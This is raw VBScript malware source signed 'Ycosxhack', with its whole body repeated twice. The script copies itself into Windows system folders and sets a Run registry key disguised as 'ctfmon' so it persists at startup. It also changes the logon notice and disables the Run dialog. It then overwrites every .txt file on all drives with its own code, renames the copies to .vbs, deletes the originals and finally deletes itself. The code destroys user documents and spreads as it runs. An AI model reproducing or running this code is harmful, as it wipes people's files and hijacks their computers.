'Ycosxhack [Y.X.H]
on error resume next
set fso=createobject("scripting.filesystemobject")
randomize
name=int(rnd*10000000+1)
temp=name
for i=0 to 2
set dir=fso.getspecialfolder(i)
fso.getfile(wscript.scriptfullname).copy(dir&"\"&name&".vbs")
next
'--------------------------------------------------------
set reg=createobject("wscript.shell")
reg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ctfmon","c:\windows\system32\"&temp&".vbs"
reg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","hack"
reg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","sorry!!!"
reg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
'--------------------------------------------------------
set self=fso.opentextfile(wscript.scriptfullname,1)
cover=self.readall
self.close
set drvs=fso.drives
for each drv in drvs
if drv.drivetype=1 or drv.drivetype=2 or drv.drivetype=3 or drv.drivetype=4 then
'wscript.echo drv
scan(drv)
end if
next
set selfkill=fso.getfile(wscript.scriptfullname)
selfkill.delete(true)
'--------------------------------------------------------
sub scan(folder_)
on error resume next
set folder_=fso.getfolder(folder_)
set files=folder_.files
for each file in files
ext=fso.getextensionname(file)
ext=lcase(ext)
if ext="txt" then
set ap=fso.opentextfile(file.path,2,true)
ap.write cover
ap.close
fso.getfile(file.path).copy(file.path&".vbs")
file.delete(true)
end if
next
set subfolders=folder_.subfolders
for each subfolder in subfolders
scan(subfolder)
next
end sub
'--------------------------------------------------------
on error resume next
set fso=createobject("scripting.filesystemobject")
randomize
name=int(rnd*10000000+1)
temp=name
for i=0 to 2
set dir=fso.getspecialfolder(i)
fso.getfile(wscript.scriptfullname).copy(dir&"\"&name&".vbs")
next
'--------------------------------------------------------
set reg=createobject("wscript.shell")
reg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ctfmon","c:\windows\system32\"&temp&".vbs"
reg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","hack"
reg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","sorry!!!"
reg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD"
'--------------------------------------------------------
set self=fso.opentextfile(wscript.scriptfullname,1)
cover=self.readall
self.close
set drvs=fso.drives
for each drv in drvs
if drv.drivetype=1 or drv.drivetype=2 or drv.drivetype=3 or drv.drivetype=4 then
'wscript.echo drv
scan(drv)
end if
next
set selfkill=fso.getfile(wscript.scriptfullname)
selfkill.delete(true)
'--------------------------------------------------------
sub scan(folder_)
on error resume next
set folder_=fso.getfolder(folder_)
set files=folder_.files
for each file in files
ext=fso.getextensionname(file)
ext=lcase(ext)
if ext="txt" then
set ap=fso.opentextfile(file.path,2,true)
ap.write cover
ap.close
fso.getfile(file.path).copy(file.path&".vbs")
file.delete(true)
end if
next
set subfolders=folder_.subfolders
for each subfolder in subfolders
scan(subfolder)
next
end sub
'--------------------------------------------------------
